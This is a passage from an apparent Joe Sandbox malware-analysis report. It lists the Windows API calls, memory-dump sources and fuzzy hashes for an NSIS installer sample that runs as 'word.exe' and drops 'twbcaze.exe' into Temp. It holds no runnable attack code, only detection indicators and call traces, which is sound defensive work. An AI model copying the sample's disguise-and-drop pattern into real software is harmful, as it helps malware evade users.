                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 1892508949-2935972921
                                          • Opcode ID: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                          • Instruction ID: 7e794a0d764ef42534189bc4677109bd04a63590121f3ac1906b169044d7ab5d
                                          • Opcode Fuzzy Hash: 2bf56f72201c9e699422734a4e548a5e4c3f3c6807ff828ac4a79b9dc522e826
                                          • Instruction Fuzzy Hash: 67112B35504141ABEF317BA55D419BF26B0EE92314728063FF582722D2C63C0943A62F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                            • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,004031A9,nrdosueajqjitn Setup,NSIS Error), ref: 00405BA5
                                            • Part of subcall function 0040571F: CharNextA.USER32(004054D1), ref: 0040572D
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405732
                                            • Part of subcall function 0040571F: CharNextA.USER32(00000000), ref: 00405741
                                          • lstrlenA.KERNEL32(C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057BF
                                          • GetFileAttributesA.KERNELBASE(C:\,C:\,C:\,C:\,C:\,C:\,00000000,C:\,C:\,?,?,?,004054D1,?,C:\Users\user\AppData\Local\Temp\,?), ref: 004057CF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                          • String ID: C:\
                                          • API String ID: 3248276644-3404278061
                                          • Opcode ID: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                          • Instruction ID: 54d673280676c30d7487fb506765264cad7adccc2ba99e33922fd806b78c8ed4
                                          • Opcode Fuzzy Hash: 0c6b5d1daa3c2ede88059e0d3e78c561d31498b229fd294e54aeb43f41febe10
                                          • Instruction Fuzzy Hash: DAF0C829105D509AD222373A5C05ABF2655CE86364F19063BFC55B32D2DB3C8943FD7E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph (rendered image in the original report; legend: Executed / Not Executed)
                                          APIs
                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                          • CloseHandle.KERNEL32(?), ref: 0040542A
                                          Strings
                                          • Error launching installer, xrefs: 0040540B
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID: Error launching installer
                                          • API String ID: 3712363035-66219284
                                          • Opcode ID: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                          • Instruction ID: 7090b7fc8b0b8bfe0e18f62cc41de09a41a9c6505e722368f6ae49628a4dc155
                                          • Opcode Fuzzy Hash: d49f44695edecb7d462127f99e45c7a2ce7d09c155a88fefc4d0509107339d45
                                          • Instruction Fuzzy Hash: F6E0ECB4A00219BBDB109F64ED09AABBBBCFB00304F50C521E910E2160E774E950CA69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                          • Instruction ID: 2446724231f05ea51107c8768389afa7e2a62b3a86e3c0cdb9b17195a5c17046
                                          • Opcode Fuzzy Hash: 00f2de6477f22270801ef5006171c2706c5d9d3ffcda3e5f9c9b7caabde0979f
                                          • Instruction Fuzzy Hash: E9A14F71E00228CFDB28CFA8C8547ADBBB1FB45305F21816AD956BB281D7785A96CF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                          • Instruction ID: c9a91825e94b1235ed1e5db661991067e3a312009d26920905f6c04b87fbb156
                                          • Opcode Fuzzy Hash: b90b51789b68cdbba6ca9369e5ad938c532d61a1d7775d6d72ffdff9632d9f26
                                          • Instruction Fuzzy Hash: 25913F71E00228CFDF28DFA8C8547ADBBB1FB44305F15816AD916BB291C3789A96DF44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                          • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • Part of subcall function 00404E84: lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • Part of subcall function 00404E84: SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F18
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F32
                                            • Part of subcall function 00404E84: SendMessageA.USER32 ref: 00404F40
                                            • Part of subcall function 004053F8: CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00422540,Error launching installer), ref: 0040541D
                                            • Part of subcall function 004053F8: CloseHandle.KERNEL32(?), ref: 0040542A
                                          • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00401E72
                                          • GetExitCodeProcess.KERNELBASE(?,?), ref: 00401E82
                                          • CloseHandle.KERNEL32(?), ref: 00401EA7
                                          Similarity
                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcat
                                          • String ID:
                                          • API String ID: 3521207402-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Similarity
                                          • API ID: MessageSend
                                          • String ID:
                                          • API String ID: 3850602802-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                          • GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                            • Part of subcall function 00405EBA: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00405ED1
                                            • Part of subcall function 00405EBA: wsprintfA.USER32 ref: 00405F0A
                                            • Part of subcall function 00405EBA: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00405F1E
                                          Similarity
                                          • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                          • String ID:
                                          • API String ID: 2547128583-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(00000003,00402C95,C:\Users\user\AppData\Roaming\word.exe,80000000,00000003), ref: 00405873
                                          • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405895
                                          Similarity
                                          • API ID: File$AttributesCreate
                                          • String ID:
                                          • API String ID: 415043291-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CloseHandle.KERNELBASE(FFFFFFFF), ref: 0040351C
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp\nso8B21.tmp\, xrefs: 00403530
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: C:\Users\user\AppData\Local\Temp\nso8B21.tmp\
                                          • API String ID: 2962429428-2245220532
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(?,0040565B,?,?,?), ref: 00405854
                                          • SetFileAttributesA.KERNELBASE(?,00000000), ref: 00405866
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CreateDirectoryA.KERNELBASE(?,00000000,004030EE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 004053C9
                                          • GetLastError.KERNEL32 ref: 004053D7
                                          Similarity
                                          • API ID: CreateDirectoryErrorLast
                                          • String ID:
                                          • API String ID: 1375471231-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF), ref: 00403098
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E1C,0000E9E4), ref: 004030C1
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FilePointer
                                          • String ID:
                                          • API String ID: 973152223-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,00000403), ref: 00405021
                                          • GetDlgItem.USER32(?,000003EE), ref: 00405030
                                          • GetClientRect.USER32 ref: 0040506D
                                          • GetSystemMetrics.USER32 ref: 00405075
                                          • SendMessageA.USER32 ref: 00405096
                                          • SendMessageA.USER32 ref: 004050A7
                                          • SendMessageA.USER32 ref: 004050BA
                                          • SendMessageA.USER32 ref: 004050C8
                                          • SendMessageA.USER32 ref: 004050DB
                                          • ShowWindow.USER32(00000000,?), ref: 004050FD
                                          • ShowWindow.USER32(?,00000008), ref: 00405111
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405132
                                          • SendMessageA.USER32 ref: 00405142
                                          • SendMessageA.USER32 ref: 0040515B
                                          • SendMessageA.USER32 ref: 00405167
                                          • GetDlgItem.USER32(?,000003F8), ref: 0040503F
                                            • Part of subcall function 00403E89: SendMessageA.USER32 ref: 00403E97
                                          • GetDlgItem.USER32(?,000003EC), ref: 00405184
                                          • CreateThread.KERNEL32(00000000,00000000,Function_00004F56,00000000), ref: 00405192
                                          • CloseHandle.KERNEL32(00000000), ref: 00405199
                                          • ShowWindow.USER32(00000000), ref: 004051BD
                                          • ShowWindow.USER32(00000000,00000008), ref: 004051C2
                                          • ShowWindow.USER32(00000008), ref: 00405209
                                          • SendMessageA.USER32 ref: 0040523B
                                          • CreatePopupMenu.USER32 ref: 0040524C
                                          • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 00405261
                                          • GetWindowRect.USER32(00000000,?), ref: 00405274
                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405298
                                          • SendMessageA.USER32 ref: 004052D3
                                          • OpenClipboard.USER32(00000000), ref: 004052E3
                                          • EmptyClipboard.USER32 ref: 004052E9
                                          • GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 004052F2
                                          • GlobalLock.KERNEL32 ref: 004052FC
                                          • SendMessageA.USER32 ref: 00405310
                                          • GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 00405328
                                          • SetClipboardData.USER32 ref: 00405333
                                          • CloseClipboard.USER32 ref: 00405339
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                          • String ID: {
                                          • API String ID: 590372296-366298937
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003F9), ref: 004047EA
                                          • GetDlgItem.USER32(?,00000408), ref: 004047F7
                                          • GlobalAlloc.KERNEL32(00000040,00000001), ref: 00404843
                                          • LoadBitmapA.USER32 ref: 00404856
                                          • SetWindowLongA.USER32(?,000000FC,00404DD4), ref: 00404870
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404884
                                          • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404898
                                          • SendMessageA.USER32 ref: 004048AD
                                          • SendMessageA.USER32 ref: 004048B9
                                          • SendMessageA.USER32 ref: 004048CB
                                          • DeleteObject.GDI32(?), ref: 004048D0
                                          • SendMessageA.USER32 ref: 004048FB
                                          • SendMessageA.USER32 ref: 00404907
                                          • SendMessageA.USER32 ref: 0040499C
                                          • SendMessageA.USER32 ref: 004049C7
                                          • SendMessageA.USER32 ref: 004049DB
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00404A0A
                                          • SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404A18
                                          • ShowWindow.USER32(?,00000005), ref: 00404A29
                                          • SendMessageA.USER32 ref: 00404B2C
                                          • SendMessageA.USER32 ref: 00404B91
                                          • SendMessageA.USER32 ref: 00404BA6
                                          • SendMessageA.USER32 ref: 00404BCA
                                          • SendMessageA.USER32 ref: 00404BF0
                                          • ImageList_Destroy.COMCTL32(?), ref: 00404C05
                                          • GlobalFree.KERNEL32(?), ref: 00404C15
                                          • SendMessageA.USER32 ref: 00404C85
                                          • SendMessageA.USER32 ref: 00404D2E
                                          • SendMessageA.USER32 ref: 00404D3D
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 00404D5D
                                          • ShowWindow.USER32(?,00000000), ref: 00404DAB
                                          • GetDlgItem.USER32(?,000003FE), ref: 00404DB6
                                          • ShowWindow.USER32(00000000), ref: 00404DBD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 1638840714-813528018
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetDlgItem.USER32(?,000003FB), ref: 004042E1
                                          • SetWindowTextA.USER32(00000000,?), ref: 0040430B
                                          • SHBrowseForFolderA.SHELL32(?,0041F908,?), ref: 004043BC
                                          • CoTaskMemFree.OLE32(00000000), ref: 004043C7
                                          • lstrcmpiA.KERNEL32("C:\Users\user\AppData\Local\Temp\twbcaze.exe" ,00420538,00000000,?,?), ref: 004043F9
                                          • lstrcatA.KERNEL32(?,"C:\Users\user\AppData\Local\Temp\twbcaze.exe" ), ref: 00404405
                                          • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404417
                                            • Part of subcall function 0040543D: GetDlgItemTextA.USER32 ref: 00405450
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E52
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E5F
                                            • Part of subcall function 00405DFA: CharNextA.USER32(?), ref: 00405E64
                                            • Part of subcall function 00405DFA: CharPrevA.USER32(?,?), ref: 00405E74
                                          • GetDiskFreeSpaceA.KERNEL32(0041F500,?,?,0000040F,?,0041F500,0041F500,?,00000001,0041F500,?,?,000003FB,?), ref: 004044D5
                                          • MulDiv.KERNEL32 ref: 004044F0
                                            • Part of subcall function 00404649: lstrlenA.KERNEL32(00420538,00420538,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404564,000000DF,00000000,00000400,?), ref: 004046E7
                                            • Part of subcall function 00404649: wsprintfA.USER32 ref: 004046EF
                                            • Part of subcall function 00404649: SetDlgItemTextA.USER32(?,00420538), ref: 00404702
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                          • String ID: "C:\Users\user\AppData\Local\Temp\twbcaze.exe" $A$C:\Users\user\AppData\Local\Temp
                                          • API String ID: 2624150263-861260144
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • CoCreateInstance.OLE32(004073F8,?,00000001,004073E8,?), ref: 004020A6
                                          • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409408,00000400,?,00000001,004073E8,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                          Strings
                                          • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: ByteCharCreateInstanceMultiWide
                                          • String ID: C:\Users\user\AppData\Local\Temp
                                          • API String ID: 123533781-2935972921
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: FileFindFirst
                                          • String ID:
                                          • API String ID: 1974802433-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                          • String ID: N$open$.B
                                          • API String ID: 3615053054-720656042
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,?), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextA.USER32(00000000,nrdosueajqjitn Setup,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                          • String ID: F$nrdosueajqjitn Setup
                                          • API String ID: 941294808-4081485430
                                          • Opcode ID: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                          • Instruction ID: 81ce27436f0092abe3ce3185f2c65b9207eacd25275343976a1476a18aae1cf1
                                          • Opcode Fuzzy Hash: cae46454919e7fa79772e51e967b3c1ae0100adcfe078b8b521791772386bd0b
                                          • Instruction Fuzzy Hash: 06418B71804249AFCB058F95DD459AFBBB9FF44315F00802AF961AA2A0C738EA51DFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00405F28: GetModuleHandleA.KERNEL32(?,?,?,00403165,0000000D), ref: 00405F3A
                                            • Part of subcall function 00405F28: GetProcAddress.KERNEL32(00000000,?,?,?,00403165,0000000D), ref: 00405F55
                                          • CloseHandle.KERNEL32(00000000), ref: 00405933
                                          • GetShortPathNameA.KERNEL32 ref: 0040593C
                                          • GetShortPathNameA.KERNEL32 ref: 00405959
                                          • wsprintfA.USER32 ref: 00405977
                                          • GetFileSize.KERNEL32(00000000,00000000,00422140,C0000000,00000004,00422140,?,?,?,00000000,000000F1,?), ref: 004059B2
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004059C1
                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004059D7
                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421D40,00000000,-0000000A,004093E4,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405A1D
                                          • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405A2F
                                          • GlobalFree.KERNEL32(00000000), ref: 00405A36
                                          • CloseHandle.KERNEL32(00000000), ref: 00405A3D
                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004057EB
                                            • Part of subcall function 004057E4: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004059F2,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000005.00000002.356736397.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000005.00000002.356732850.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356741630.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000040B000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.0000000000421000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356746108.000000000042A000.00000004.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.000000000042D000.00000002.00000001.01000000.00000004.sdmp
                                           • Associated: 00000005.00000002.356760134.0000000000433000.00000002.00000001.01000000.00000004.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_5_2_400000_word.jbxd
                                          Similarity
                                          • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                          • String ID: %s=%s$@!B$[Rename]
                                          • API String ID: 3445103937-2946522640
